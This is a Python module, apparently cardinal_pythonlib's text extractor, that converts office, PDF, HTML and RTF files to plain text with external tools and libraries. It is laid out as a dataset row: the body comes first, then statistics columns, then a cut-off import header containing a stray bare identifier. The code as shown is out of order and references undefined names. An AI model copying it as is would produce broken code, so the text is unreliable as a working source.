─────────────────────────────
Row 2 col 1
─────────────────────────────
Row 2 col 2
─────────────────────────────
- ``plain=True``
.. code-block:: none
╔═════════════════════════════════════════════════════════════════╗
Row 1 col 1
───────────────────────────────────────────────────────────────────
Row 1 col 2
═══════════════════════════════════════════════════════════════════
Row 2 col 1
───────────────────────────────────────────────────────────────────
Row 2 col 2
╚═════════════════════════════════════════════════════════════════╝
The plain format is probably better, in general, for NLP, and is
definitely clearer with nested tables (for which the word-wrapping
algorithm is imperfect). We avoid "heavy" box drawing as it has a
higher chance of being mangled under Windows.
"""
if plain and semiplain:
log.warning("You specified both plain and semiplain; using plain")
semiplain = False
middlewidth = width - 2 if width > 2 else 77
# double
if plain_table_start is None:
plain_table_start = "╔" + ("═" * middlewidth) + "╗"
if plain_table_end is None:
plain_table_end = "╚" + ("═" * middlewidth) + "╝"
# heavy
if plain_table_row_boundary is None:
plain_table_row_boundary = "═" * (middlewidth + 2)
# light
if plain_table_col_boundary is None:
plain_table_col_boundary = "─" * (middlewidth + 2)
self.encoding = encoding
self.width = width
self.min_col_width = min_col_width
self.plain = plain
self.semiplain = semiplain
self.docx_in_order = docx_in_order
self.horizontal_char = horizontal_char
self.vertical_char = vertical_char
self.junction_char = junction_char
self.plain_table_start = plain_table_start
self.plain_table_end = plain_table_end
self.plain_table_col_boundary = plain_table_col_boundary
self.plain_table_row_boundary = plain_table_row_boundary
self.rstrip = rstrip
_DEFAULT_CONFIG = TextProcessingConfig()
# =============================================================================
# Support functions
# =============================================================================
def get_filelikeobject(filename: str = None,
blob: bytes = None) -> BinaryIO:
"""
Open a file-like object.
Guard the use of this function with ``with``.
Args:
filename: for specifying via a filename
blob: for specifying via an in-memory ``bytes`` object
Returns:
a :class:`BinaryIO` object
"""
if not filename and not blob:
raise ValueError("no filename and no blob")
if filename and blob:
raise ValueError("specify either filename or blob")
if filename:
return open(filename, 'rb')
else:
return io.BytesIO(blob)
# noinspection PyUnusedLocal
def get_file_contents(filename: str = None, blob: bytes = None) -> bytes:
"""
Returns the binary contents of a file, or of a BLOB.
"""
if not filename and not blob:
raise ValueError("no filename and no blob")
if filename and blob:
raise ValueError("specify either filename or blob")
if blob:
return blob
with open(filename, 'rb') as f:
return f.read()
def get_chardet_encoding(binary_contents: bytes) -> Optional[str]:
"""
Guess the character set encoding of the specified ``binary_contents``.
"""
if not binary_contents:
return None
if chardet is None or UniversalDetector is None:
log.warning("chardet not installed; limits detection of encodings")
return None
# METHOD 1
# http://chardet.readthedocs.io/en/latest/
#
# guess = chardet.detect(binary_contents)
#
# METHOD 2: faster with large files
# http://chardet.readthedocs.io/en/latest/
# http://stackoverflow.com/questions/13857856/split-byte-string-into-lines
# noinspection PyCallingNonCallable
detector = UniversalDetector()
for byte_line in binary_contents.split(b"\n"):
detector.feed(byte_line)
if detector.done:
break
guess = detector.result
# Handle result
if 'encoding' not in guess:
log.warning("Something went wrong within chardet; no encoding")
return None
return guess['encoding']
def get_file_contents_text(
filename: str = None, blob: bytes = None,
config: TextProcessingConfig = _DEFAULT_CONFIG) -> str:
"""
Returns the string contents of a file, or of a BLOB.
"""
binary_contents = get_file_contents(filename=filename, blob=blob)
# 1. Try the encoding the user specified
if config.encoding:
try:
return binary_contents.decode(config.encoding)
except ValueError: # of which UnicodeDecodeError is more specific
# ... https://docs.python.org/3/library/codecs.html
pass
# 2. Try the system encoding
sysdef = sys.getdefaultencoding()
if sysdef != config.encoding:
try:
return binary_contents.decode(sysdef)
except ValueError:
pass
# 3. Try the best guess from chardet
# http://chardet.readthedocs.io/en/latest/usage.html
if chardet:
guess = chardet.detect(binary_contents)
if guess['encoding']:
return binary_contents.decode(guess['encoding'])
raise ValueError("Unknown encoding ({})".format(
f"filename={filename!r}" if filename else "blob"))
def get_cmd_output(*args, encoding: str = SYS_ENCODING) -> str:
"""
Returns text output of a command.
"""
log.debug("get_cmd_output(): args = {!r}", args)
p = subprocess.Popen(args, stdout=subprocess.PIPE)
stdout, stderr = p.communicate()
return stdout.decode(encoding, errors='ignore')
def get_cmd_output_from_stdin(stdint_content_binary: bytes,
*args, encoding: str = SYS_ENCODING) -> str:
"""
Returns text output of a command, passing binary data in via stdin.
"""
p = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
stdout, stderr = p.communicate(input=stdint_content_binary)
return stdout.decode(encoding, errors='ignore')
def rstrip_all_lines(text: str) -> str:
"""
Right-strips all lines in a string and returns the result.
"""
return "\n".join(
line.rstrip()
for line in text.splitlines()
)
# =============================================================================
# PDF
# =============================================================================
# noinspection PyUnresolvedReferences,PyUnusedLocal
def convert_pdf_to_txt(filename: str = None, blob: bytes = None,
config: TextProcessingConfig = _DEFAULT_CONFIG) -> str:
"""
Converts a PDF file to text.
Pass either a filename or a binary object.
"""
pdftotext = tools['pdftotext']
if pdftotext: # External command method
if filename:
return get_cmd_output(pdftotext, filename, '-')
else:
return get_cmd_output_from_stdin(blob, pdftotext, '-', '-')
elif pdfminer: # Memory-hogging method
with get_filelikeobject(filename, blob) as fp:
rsrcmgr = pdfminer.pdfinterp.PDFResourceManager()
retstr = StringIO()
codec = ENCODING
laparams = pdfminer.layout.LAParams()
device = pdfminer.converter.TextConverter(
rsrcmgr, retstr, codec=codec, laparams=laparams)
interpreter = pdfminer.pdfinterp.PDFPageInterpreter(rsrcmgr,
device)
password = ""
maxpages = 0
caching = True
pagenos = set()
for page in pdfminer.pdfpage.PDFPage.get_pages(
fp, pagenos, maxpages=maxpages, password=password,
caching=caching, check_extractable=True):
interpreter.process_page(page)
text = retstr.getvalue().decode(ENCODING)
return text
else:
raise AssertionError("No PDF-reading tool available")
def availability_pdf() -> bool:
"""
Is a PDF-to-text tool available?
"""
pdftotext = tools['pdftotext']
if pdftotext:
return True
elif pdfminer:
log.warning("PDF conversion: pdftotext missing; "
"using pdfminer (less efficient)")
return True
else:
return False
# =============================================================================
# DOCX
# =============================================================================
# -----------------------------------------------------------------------------
# In a D.I.Y. fashion
# -----------------------------------------------------------------------------
# DOCX specification: http://www.ecma-international.org/news/TC45_current_work/TC45_available_docs.htm # noqa
DOCX_HEADER_FILE_REGEX = re.compile('word/header[0-9]*.xml')
DOCX_DOC_FILE = 'word/document.xml'
DOCX_FOOTER_FILE_REGEX = re.compile('word/footer[0-9]*.xml')
DOCX_SCHEMA_URL = 'http://schemas.openxmlformats.org/wordprocessingml/2006/main' # noqa
def docx_qn(tagroot):
return f'{{{DOCX_SCHEMA_URL}}}{tagroot}'
DOCX_TEXT = docx_qn('t')
DOCX_TABLE = docx_qn('tbl') # https://github.com/python-openxml/python-docx/blob/master/docx/table.py # noqa
DOCX_TAB = docx_qn('tab')
DOCX_NEWLINES = [docx_qn('br'), docx_qn('cr')]
DOCX_NEWPARA = docx_qn('p')
DOCX_TABLE_ROW = docx_qn('tr')
DOCX_TABLE_CELL = docx_qn('tc')
def gen_xml_files_from_docx(fp: BinaryIO) -> Iterator[str]:
"""
Generate XML files (as strings) from a DOCX file.
Args:
fp: :class:`BinaryIO` object for reading the ``.DOCX`` file
Yields:
the string contents of each individual XML file within the ``.DOCX``
file
Raises:
zipfile.BadZipFile: if the zip is unreadable (encrypted?)
"""
try:
z = zipfile.ZipFile(fp)
filelist = z.namelist()
for filename in filelist:
if DOCX_HEADER_FILE_REGEX.match(filename):
yield z.read(filename).decode("utf8")
yield z.read(DOCX_DOC_FILE)
for filename in filelist:
if DOCX_FOOTER_FILE_REGEX.match(filename):
yield z.read(filename).decode("utf8")
except zipfile.BadZipFile:
# Clarify the error:
raise zipfile.BadZipFile("File is not a zip file - encrypted DOCX?")
class DocxFragment(object):
"""
Representation of a line, or multiple lines, which may or may not need
word-wrapping.
"""
# noinspection PyShadowingNames
def __init__(self, text: str, wordwrap: bool = True) -> None:
self.text = text
self.wordwrap = wordwrap
def docx_gen_wordwrapped_fragments(fragments: Iterable[DocxFragment],
width: int) -> Generator[str, None, None]:
"""
Generates word-wrapped fragments.
"""
to_wrap = [] # type: List[DocxFragment]
def yield_wrapped():
"""
Yield the word-wrapped stuff to date.
"""
nonlocal to_wrap
if to_wrap:
block = "".join(x.text for x in to_wrap)
wrapped = "\n".join(
wordwrap(line, width)
for line in block.splitlines()
)
yield wrapped
to_wrap.clear()
for f in fragments:
if f.wordwrap:
# Add it to the current wrapping block.
to_wrap.append(f)
else:
# Yield the wrapped stuff to date
yield from yield_wrapped()
# Yield the new, unwrapped
yield f.text
yield from yield_wrapped() # any leftovers
def docx_wordwrap_fragments(fragments: Iterable[DocxFragment],
width: int) -> str:
"""
Joins multiple fragments and word-wraps them as necessary.
"""
return "".join(docx_gen_wordwrapped_fragments(fragments, width))
def docx_gen_fragments_from_xml_node(
node: ElementTree.Element,
level: int,
config: TextProcessingConfig) -> Generator[DocxFragment, None, None]:
"""
Returns text from an XML node within a DOCX file.
Args:
node: an XML node
level: current level in XML hierarchy (used for recursion; start level
is 0)
config: :class:`TextProcessingConfig` control object
Returns:
contents as a string
"""
tag = node.tag # for speed
log.debug("Level {}, tag {}", level, tag)
if tag == DOCX_TEXT:
log.debug("Text: {!r}", node.text)
yield DocxFragment(node.text or "")
elif tag == DOCX_TAB:
log.debug("Tab")
yield DocxFragment("\t")
elif tag in DOCX_NEWLINES: # rarely used? Mostly "new paragraph"
log.debug("Newline")
yield DocxFragment("\n")
elif tag == DOCX_NEWPARA: # Note that e.g. all table cells start with this
log.debug("New paragraph")
yield DocxFragment("\n\n")
# One or two newlines? Clarity better with two -- word-wrapping means
# that "single" source lines can take up multiple lines in text format.
# So we need a gap between lines to ensure paragraph separation is
# visible -- i.e. two newlines.
if tag == DOCX_TABLE:
log.debug("Table")
yield DocxFragment("\n", wordwrap=False)
yield DocxFragment(docx_table_from_xml_node(node, level, config),
wordwrap=False)
else:
for child in node:
for fragment in docx_gen_fragments_from_xml_node(
child, level + 1, config):
yield fragment
def docx_text_from_xml_node(node: ElementTree.Element,
level: int,
config: TextProcessingConfig) -> str:
"""
Returns text from an XML node within a DOCX file.
Args:
node: an XML node
level: current level in XML hierarchy (used for recursion; start level
is 0)
config: :class:`TextProcessingConfig` control object
Returns:
contents as a string
"""
return docx_wordwrap_fragments(
docx_gen_fragments_from_xml_node(node, level, config),
config.width)
def docx_text_from_xml(xml: str, config: TextProcessingConfig) -> str:
"""
Converts an XML tree of a DOCX file to string contents.
Args:
xml: raw XML text
config: :class:`TextProcessingConfig` control object
Returns:
contents as a string
"""
root = ElementTree.fromstring(xml)
return docx_text_from_xml_node(root, 0, config)
class CustomDocxParagraph(object):
"""
Represents a paragraph of text in a DOCX file.
"""
def __init__(self, text: str = '') -> None:
self.text = text or ''
def __repr__(self) -> str:
return f"CustomDocxParagraph(text={self.text!r})"
class CustomDocxTableCell(object):
"""
Represents a cell within a table of a DOCX file.
May contain several paragraphs.
"""
def __init__(self, paragraphs: List[CustomDocxParagraph] = None) -> None:
self.paragraphs = paragraphs or []
def add_paragraph(self, text: str) -> None:
self.paragraphs.append(CustomDocxParagraph(text))
def __repr__(self) -> str:
return f"CustomDocxTableCell(paragraphs={self.paragraphs!r})"
class CustomDocxTableRow(object):
"""
Represents a row within a table of a DOCX file.
May contain several cells (one per column).
"""
def __init__(self, cells: List[CustomDocxTableCell] = None) -> None:
self.cells = cells or []
def add_cell(self, cell: CustomDocxTableCell) -> None:
self.cells.append(cell)
def new_cell(self) -> None:
self.cells.append(CustomDocxTableCell())
def add_paragraph(self, text: str) -> None:
self.cells[-1].add_paragraph(text)
def __repr__(self) -> str:
return f"CustomDocxTableRow(cells={self.cells!r})"
class CustomDocxTable(object):
"""
Represents a table of a DOCX file.
May contain several rows.
"""
def __init__(self, rows: List[CustomDocxTableRow] = None) -> None:
self.rows = rows or []
def add_row(self, row: CustomDocxTableRow) -> None:
self.rows.append(row)
def new_row(self) -> None:
self.rows.append(CustomDocxTableRow())
def new_cell(self) -> None:
self.rows[-1].new_cell()
def add_paragraph(self, text: str) -> None:
self.rows[-1].add_paragraph(text)
def __repr__(self) -> str:
return f"CustomDocxTable(rows={self.rows!r})"
def docx_table_from_xml_node(table_node: ElementTree.Element,
level: int,
config: TextProcessingConfig) -> str:
"""
Converts an XML node representing a DOCX table into a textual
representation.
Args:
table_node: XML node
level: current level in XML hierarchy (used for recursion; start level
is 0)
config: :class:`TextProcessingConfig` control object
Returns:
string representation
"""
table = CustomDocxTable()
for row_node in table_node:
if row_node.tag != DOCX_TABLE_ROW:
continue
table.new_row()
for cell_node in row_node:
if cell_node.tag != DOCX_TABLE_CELL:
continue
table.new_cell()
for para_node in cell_node:
text = docx_text_from_xml_node(para_node, level, config)
if text:
table.add_paragraph(text)
return docx_process_table(table, config)
# -----------------------------------------------------------------------------
# Generic
# -----------------------------------------------------------------------------
def wordwrap(text: str, width: int) -> str:
"""
Word-wraps text.
Args:
text:
text to process (will be treated as a single line)
width:
width to word-wrap to (or 0 to skip word wrapping)
Returns:
wrapped text
.. code-block:: python
from cardinal_pythonlib.extract_text import *
text = "Here is a very long line that may be word-wrapped. " * 50
print(docx_wordwrap(text, 80))
"""
if not text:
return ''
if width:
return '\n'.join(textwrap.wrap(text, width=width))
return text
def docx_process_table(table: DOCX_TABLE_TYPE,
config: TextProcessingConfig) -> str:
"""
Converts a DOCX table to text.
Structure representing a DOCX table:
.. code-block:: none
table
.rows[]
.cells[]
.paragraphs[]
.text
That's the structure of a :class:`docx.table.Table` object, but also of our
homebrew creation, :class:`CustomDocxTable`.
- The ``plain`` and ``semiplain`` options are implemented via the
:class:`TextProcessingConfig`.
- Note also that the grids in DOCX files can have varying number of cells
per row, e.g.
.. code-block:: none
+---+---+---+
| 1 | 2 | 3 |
+---+---+---+
| 1 | 2 |
+---+---+
"""
def get_cell_text(cell_) -> str:
cellparagraphs = [paragraph.text.strip()
for paragraph in cell_.paragraphs]
cellparagraphs = [x for x in cellparagraphs if x]
return '\n\n'.join(cellparagraphs)
if config.plain:
# ---------------------------------------------------------------------
# Plain -- good for NLP and better for word-wrapping
# ---------------------------------------------------------------------
lines = [config.plain_table_start] # type: List[str]
for r, row in enumerate(table.rows):
if r > 0:
lines.append(config.plain_table_row_boundary)
for c, cell in enumerate(row.cells):
if c > 0:
lines.append(config.plain_table_col_boundary)
lines.append(get_cell_text(cell))
lines.append(config.plain_table_end)
return "\n".join(lines)
else:
# ---------------------------------------------------------------------
# Full table visualization, or semiplain
# ---------------------------------------------------------------------
ncols = 1
# noinspection PyTypeChecker
for row in table.rows:
ncols = max(ncols, len(row.cells))
pt = prettytable.PrettyTable(
field_names=list(range(ncols)),
encoding=ENCODING,
header=False,
border=True,
hrules=prettytable.ALL,
vrules=prettytable.NONE if config.semiplain else prettytable.ALL,
# Can we use UTF-8 special characters?
# Even under Windows, sys.getdefaultencoding() returns "utf-8"
# (under Python 3.6.8, Windows 6.1.7601 = Windows Server 2008 R2).
# The advantage would be that these characters are not likely to
# influence any form of NLP.
horizontal_char=config.horizontal_char, # default "-"
vertical_char=config.vertical_char, # default "|"
junction_char=config.junction_char, # default "+"
)
pt.align = 'l'
pt.valign = 't'
pt.max_width = max(config.width // ncols, config.min_col_width)
if config.semiplain:
# noinspection PyTypeChecker
for row in table.rows:
for i, cell in enumerate(row.cells):
n_before = i
n_after = ncols - i - 1
# ... use ncols, not len(row.cells), since "cells per row"
# is not constant, but prettytable wants a fixed
# number. (changed in v0.2.8)
ptrow = (
[''] * n_before +
[get_cell_text(cell)] +
[''] * n_after
)
assert(len(ptrow) == ncols)
pt.add_row(ptrow)
else:
# noinspection PyTypeChecker
for row in table.rows:
ptrow = [] # type: List[str]
# noinspection PyTypeChecker
for cell in row.cells:
ptrow.append(get_cell_text(cell))
ptrow += [''] * (ncols - len(ptrow)) # added in v0.2.8
assert (len(ptrow) == ncols)
pt.add_row(ptrow)
return pt.get_string()
# -----------------------------------------------------------------------------
# With the docx library
# -----------------------------------------------------------------------------
_ = '''
# noinspection PyProtectedMember,PyUnresolvedReferences
def docx_docx_iter_block_items(parent: DOCX_CONTAINER_TYPE) \
-> Iterator[DOCX_BLOCK_ITEM_TYPE]:
"""
Iterate through items of a DOCX file.
See https://github.com/python-openxml/python-docx/issues/40.
Yield each paragraph and table child within ``parent``, in document order.
Each returned value is an instance of either :class:`Table` or
:class:`Paragraph`. ``parent`` would most commonly be a reference to a main
:class:`Document` object, but also works for a :class:`_Cell` object, which
itself can contain paragraphs and tables.
NOTE: uses internals of the ``python-docx`` (``docx``) library; subject to
change; this version works with ``docx==0.8.5``.
"""
if isinstance(parent, docx.document.Document):
parent_elm = parent.element.body
elif isinstance(parent, docx.table._Cell):
parent_elm = parent._tc
else:
raise ValueError("something's not right")
for child in parent_elm.iterchildren():
if isinstance(child, docx.oxml.text.paragraph.CT_P):
yield docx.text.paragraph.Paragraph(child, parent)
elif isinstance(child, docx.oxml.table.CT_Tbl):
yield docx.table.Table(child, parent)
# noinspection PyUnresolvedReferences
def docx_docx_gen_text(doc: DOCX_DOCUMENT_TYPE,
config: TextProcessingConfig) -> Iterator[str]:
"""
Iterate through a DOCX file and yield text.
Args:
doc: DOCX document to process
config: :class:`TextProcessingConfig` control object
Yields:
pieces of text (paragraphs)
"""
if in_order:
for thing in docx_docx_iter_block_items(doc):
if isinstance(thing, docx.text.paragraph.Paragraph):
yield docx_process_simple_text(thing.text, config.width)
elif isinstance(thing, docx.table.Table):
yield docx_process_table(thing, config)
else:
for paragraph in doc.paragraphs:
yield docx_process_simple_text(paragraph.text, config.width)
for table in doc.tables:
yield docx_process_table(table, config)
'''
# noinspection PyUnusedLocal
def convert_docx_to_text(
filename: str = None, blob: bytes = None,
config: TextProcessingConfig = _DEFAULT_CONFIG) -> str:
"""
Converts a DOCX file to text.
Pass either a filename or a binary object.
Args:
filename: filename to process
blob: binary ``bytes`` object to process
config: :class:`TextProcessingConfig` control object
Returns:
text contents
Notes:
- Old ``docx`` (https://pypi.python.org/pypi/python-docx) has been
superseded (see https://github.com/mikemaccana/python-docx).
- ``docx.opendocx(file)`` uses :class:`zipfile.ZipFile`, which can take
either a filename or a file-like object
(https://docs.python.org/2/library/zipfile.html).
- Method was:
.. code-block:: python
with get_filelikeobject(filename, blob) as fp:
document = docx.opendocx(fp)
paratextlist = docx.getdocumenttext(document)
return '\n\n'.join(paratextlist)
- Newer ``docx`` is python-docx
- https://pypi.python.org/pypi/python-docx
- https://python-docx.readthedocs.org/en/latest/
- http://stackoverflow.com/questions/25228106
However, it uses ``lxml``, which has C dependencies, so it doesn't always
install properly on e.g. bare Windows machines.
PERFORMANCE of my method:
- nice table formatting
- but tables grouped at end, not in sensible places
- can iterate via ``doc.paragraphs`` and ``doc.tables`` but not in
true document order, it seems
- others have noted this too:
- https://github.com/python-openxml/python-docx/issues/40
- https://github.com/deanmalmgren/textract/pull/92
- ``docx2txt`` is at https://pypi.python.org/pypi/docx2txt/0.6; this is
pure Python. Its command-line function appears to be for Python 2 only
(2016-04-21: crashes under Python 3; is due to an encoding bug). However,
it seems fine as a library. It doesn't handle in-memory blobs properly,
though, so we need to extend it.
PERFORMANCE OF ITS ``process()`` function:
- all text comes out
- table text is in a sensible place
- table formatting is lost.
- Other manual methods (not yet implemented):
http://etienned.github.io/posts/extract-text-from-word-docx-simply/.
Looks like it won't deal with header stuff (etc.) that ``docx2txt``
handles.
- Upshot: we need a DIY version.
- See also this "compile lots of techniques" libraries, which has C
dependencies: http://textract.readthedocs.org/en/latest/
"""
text = ''
with get_filelikeobject(filename, blob) as fp:
for xml in gen_xml_files_from_docx(fp):
text += docx_text_from_xml(xml, config)
return text
# elif docx:
# with get_filelikeobject(filename, blob) as fp:
# # noinspection PyUnresolvedReferences
# document = docx.Document(fp)
# return '\n\n'.join(
# docx_docx_gen_text(document, config))
# elif docx2txt:
# if filename:
# return docx2txt.process(filename)
# else:
# raise NotImplementedError("docx2txt BLOB handling not written")
# else:
# raise AssertionError("No DOCX-reading tool available")
# =============================================================================
# ODT
# =============================================================================
# noinspection PyUnusedLocal
def convert_odt_to_text(filename: str = None,
blob: bytes = None,
config: TextProcessingConfig = _DEFAULT_CONFIG) -> str:
"""
Converts an OpenOffice ODT file to text.
Pass either a filename or a binary object.
"""
# We can't use exactly the same method as for DOCX files, using docx:
# sometimes that works, but sometimes it falls over with:
# KeyError: "There is no item named 'word/document.xml' in the archive"
with get_filelikeobject(filename, blob) as fp:
z = zipfile.ZipFile(fp)
tree = ElementTree.fromstring(z.read('content.xml'))
# ... may raise zipfile.BadZipfile
textlist = [] # type: List[str]
for element in tree.iter():
if element.text:
textlist.append(element.text.strip())
return '\n\n'.join(textlist)
# =============================================================================
# HTML
# =============================================================================
# noinspection PyUnusedLocal
def convert_html_to_text(
filename: str = None,
blob: bytes = None,
config: TextProcessingConfig = _DEFAULT_CONFIG) -> str:
"""
Converts HTML to text.
"""
with get_filelikeobject(filename, blob) as fp:
soup = bs4.BeautifulSoup(fp)
return soup.get_text()
# =============================================================================
# XML
# =============================================================================
# noinspection PyUnusedLocal
def convert_xml_to_text(filename: str = None,
blob: bytes = None,
config: TextProcessingConfig = _DEFAULT_CONFIG) -> str:
"""
Converts XML to text.
"""
with get_filelikeobject(filename, blob) as fp:
soup = bs4.BeautifulStoneSoup(fp)
return soup.get_text()
# =============================================================================
# RTF
# =============================================================================
# noinspection PyUnresolvedReferences,PyUnusedLocal
def convert_rtf_to_text(filename: str = None,
blob: bytes = None,
config: TextProcessingConfig = _DEFAULT_CONFIG) -> str:
"""
Converts RTF to text.
"""
unrtf = tools['unrtf']
if unrtf: # Best
args = [unrtf, '--text', '--nopict']
if UNRTF_SUPPORTS_QUIET:
args.append('--quiet')
if filename:
args.append(filename)
return get_cmd_output(*args)
else:
return get_cmd_output_from_stdin(blob, *args)
elif pyth: # Very memory-consuming:
# https://github.com/brendonh/pyth/blob/master/pyth/plugins/rtf15/reader.py # noqa
with get_filelikeobject(filename, blob) as fp:
doc = pyth.plugins.rtf15.reader.Rtf15Reader.read(fp)
return (
pyth.plugins.plaintext.writer.PlaintextWriter.write(doc).getvalue()
)
else:
raise AssertionError("No RTF-reading tool available")
def availability_rtf() -> bool:
"""
Is an RTF processor available?
"""
unrtf = tools['unrtf']
if unrtf:
return True
elif pyth:
log.warning("RTF conversion: unrtf missing; "
"using pyth (less efficient)")
return True
else:
return False
# =============================================================================
# DOC
# =============================================================================
# noinspection PyUnusedLocal
def convert_doc_to_text(filename: str = None,
blob: bytes = None,
config: TextProcessingConfig = _DEFAULT_CONFIG) -> str:
"""
Converts Microsoft Word DOC files to text.
"""
antiword = tools['antiword']
if antiword:
if filename:
return get_cmd_output(antiword, '-w', str(config.width), filename)
else:
return get_cmd_output_from_stdin(blob, antiword, '-w',
str(config.width), '-')
else:
raise AssertionError("No DOC-reading tool available")
def availability_doc() -> bool:
"""
Is a DOC processor available?
"""
antiword = tools['antiword']
return bool(antiword)
# =============================================================================
# Anything
# =============================================================================
# noinspection PyUnusedLocal
def convert_anything_to_text(
filename: str = None,
blob: bytes = None,
config: TextProcessingConfig = _DEFAULT_CONFIG) -> str:
"""
Convert arbitrary files to text, using ``strings`` or ``strings2``.
(``strings`` is a standard Unix command to get text from any old rubbish.)
"""
strings = tools['strings'] or tools['strings2']
if strings:
if filename:
return get_cmd_output(strings, filename)
else:
return get_cmd_output_from_stdin(blob, strings)
else:
raise AssertionError("No fallback string-reading tool available")
def availability_anything() -> bool:
"""
Is a generic "something-to-text" processor available?
"""
strings = tools['strings'] or tools['strings2']
return bool(strings)
# =============================================================================
# Decider
# =============================================================================
ext_map = {
# Converter functions must be of the form: func(filename, blob, config).
# Availability must be either a boolean literal or a function that takes no
# params.
'.csv': {
CONVERTER: get_file_contents_text,
AVAILABILITY: True,
},
'.doc': {
CONVERTER: convert_doc_to_text,
AVAILABILITY: availability_doc,
},
'.docm': {
CONVERTER: convert_docx_to_text,
AVAILABILITY: True,
},
'.docx': {
CONVERTER: convert_docx_to_text,
AVAILABILITY: True,
},
'.dot': {
CONVERTER: convert_doc_to_text,
AVAILABILITY: availability_doc,
},
'.htm': {
CONVERTER: convert_html_to_text,
AVAILABILITY: True,
},
'.html': {
CONVERTER: convert_html_to_text,
AVAILABILITY: True,
},
'.log': {
CONVERTER: get_file_contents_text,
AVAILABILITY: True,
},
# .msg is often Outlook binary, not text
#
# '.msg': {
# CONVERTER: get_file_contents_text,
# AVAILABILITY: True,
# },
'.odt': {
CONVERTER: convert_odt_to_text,
AVAILABILITY: True,
},
'.pdf': {
CONVERTER: convert_pdf_to_txt,
AVAILABILITY: availability_pdf,
},
'.rtf': {
CONVERTER: convert_rtf_to_text,
AVAILABILITY: availability_rtf,
},
'.txt': {
CONVERTER: get_file_contents_text,
AVAILABILITY: True,
},
'.xml': {
CONVERTER: convert_xml_to_text,
AVAILABILITY: True,
},
None: { # fallback
CONVERTER: convert_anything_to_text,
AVAILABILITY: availability_anything,
},
}
def document_to_text(filename: str = None,
blob: bytes = None,
extension: str = None,
config: TextProcessingConfig = _DEFAULT_CONFIG) -> str:
"""
Converts a document to text.
This function selects a processor based on the file extension (either from
the filename, or, in the case of a BLOB, the extension specified manually
via the ``extension`` parameter).
Pass either a filename or a binary object.
Args:
filename:
the filename to read
blob:
binary content (alternative to ``filename``)
extension:
file extension, used as a hint when ``blob`` is used
config:
an optional :class:`TextProcessingConfig` object
Returns:
Returns a string if the file was processed (potentially an empty
string).
Raises:
Raises an exception for malformed arguments, missing files, bad
filetypes, etc.
"""
if not filename and not blob:
raise ValueError("document_to_text: no filename and no blob")
if filename and blob:
raise ValueError("document_to_text: specify either filename or blob")
if blob and not extension:
raise ValueError("document_to_text: need extension hint for blob")
if filename:
stub, extension = os.path.splitext(filename)
else:
if extension[0] != ".":
extension = "." + extension
extension = extension.lower()
# Ensure blob is an appropriate type
log.debug(
f"filename: {filename}, blob type: {type(blob)}, "
f"blob length: {len(blob) if blob is not None else None}, "
f"extension: {extension}")
# If we were given a filename and the file doesn't exist, don't bother.
if filename and not os.path.isfile(filename):
raise ValueError(f"document_to_text: no such file: {filename!r}")
# Choose method
info = ext_map.get(extension)
if info is None:
log.warning("Unknown filetype: {}; using generic tool", extension)
info = ext_map[None]
func = info[CONVERTER]
text = func(filename, blob, config)
if config.rstrip:
text = rstrip_all_lines(text)
return text
def is_text_extractor_available(extension: str) -> bool:
"""
Is a text extractor available for the specified extension?
"""
if extension is not None:
extension = extension.lower()
info = ext_map.get(extension)
if info is None:
return False
availability = info[AVAILABILITY]
if type(availability) == bool:
return availability
elif callable(availability):
return availability()
else:
raise ValueError(
f"Bad information object for extension: {extension}")
def require_text_extractor(extension: str) -> None:
"""
Require that a text extractor is available for the specified extension,
or raise :exc:`ValueError`.
"""
if not is_text_extractor_available(extension):
raise ValueError(
f"No text extractor available for extension: {extension}")
# =============================================================================
# main, for command-line use
# =============================================================================
def main() -> None:
"""
Command-line processor. See ``--help`` for details.
"""
logging.basicConfig(level=logging.DEBUG)
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("inputfile", nargs="?", help="Input file name")
parser.add_argument(
"--availability", nargs='*',
help="File extensions to check availability for (use a '.' prefix, "
"and use the special extension 'None' to check the fallback "
"processor")
parser.add_argument(
'--plain', action='store_true',
help="Use plainest format (re e.g. table layouts)")
parser.add_argument(
'--semiplain', action='store_true',
help="Use semi-plain format (re e.g. table layouts)")
parser.add_argument(
"--width", type=int, default=DEFAULT_WIDTH,
help=f"Word wrapping width")
parser.add_argument(
"--min-col-width", type=int, default=DEFAULT_MIN_COL_WIDTH,
help=f"Minimum column width for tables")
args = parser.parse_args()
if args.availability:
for ext in args.availability:
if ext.lower() == 'none':
ext = None
available = is_text_extractor_available(ext)
print(f"Extractor for extension {ext} present: {available}")
return
if not args.inputfile:
parser.print_help(sys.stderr)
return
config = TextProcessingConfig(
width=args.width,
min_col_width=args.min_col_width,
plain=args.plain,
semiplain=args.semiplain,
)
result = document_to_text(filename=args.inputfile, config=config)
if result is None:
return
else:
print(result)
if __name__ == '__main__':
main()
# *** antiword -w width
| 32.857687
| 118
| 0.56899
|
import argparse
from io import StringIO
import io
import logging
import os
import re
import shutil
import subprocess
import sys
import textwrap
from typing import (
BinaryIO, Dict, Generator, Iterable, Iterator, List, Optional, Union,
)
from xml.etree import ElementTree as ElementTree
import zipfile
import bs4
import prettytable
from semantic_version import Version
get_brace_style_log_with_null_handler
try:
import chardet
from chardet.universaldetector import UniversalDetector
except ImportError:
chardet = None
UniversalDetector = None
try:
# noinspection PyPackageRequirements
import docx # pip install python-docx (NOT docx) - BUT python-docx requires lxml which has C dependencies # noqa
# noinspection PyPackageRequirements
import docx.document
# noinspection PyPackageRequirements
import docx.oxml.table
# noinspection PyPackageRequirements
import docx.oxml.text.paragraph
# noinspection PyPackageRequirements
import docx.table
# noinspection PyPackageRequirements
import docx.text.paragraph
DOCX_DOCUMENT_TYPE = "docx.document.Document"
DOCX_TABLE_TYPE = Union["docx.table.Table", "CustomDocxTable"]
DOCX_CONTAINER_TYPE = Union[DOCX_DOCUMENT_TYPE, "docx.table._Cell"]
DOCX_BLOCK_ITEM_TYPE = Union["docx.text.paragraph.Paragraph",
"docx.table.Table"]
except ImportError:
docx = None
DOCX_DOCUMENT_TYPE = None
DOCX_TABLE_TYPE = "CustomDocxTable"
DOCX_CONTAINER_TYPE = None
DOCX_BLOCK_ITEM_TYPE = None
try:
import docx2txt # pip install docx2txt
except ImportError:
docx2txt = None
try:
# noinspection PyPackageRequirements
import pdfminer # pip install pdfminer
# noinspection PyPackageRequirements
import pdfminer.pdfinterp
# noinspection PyPackageRequirements
import pdfminer.converter
# noinspection PyPackageRequirements
import pdfminer.layout
# noinspection PyPackageRequirements
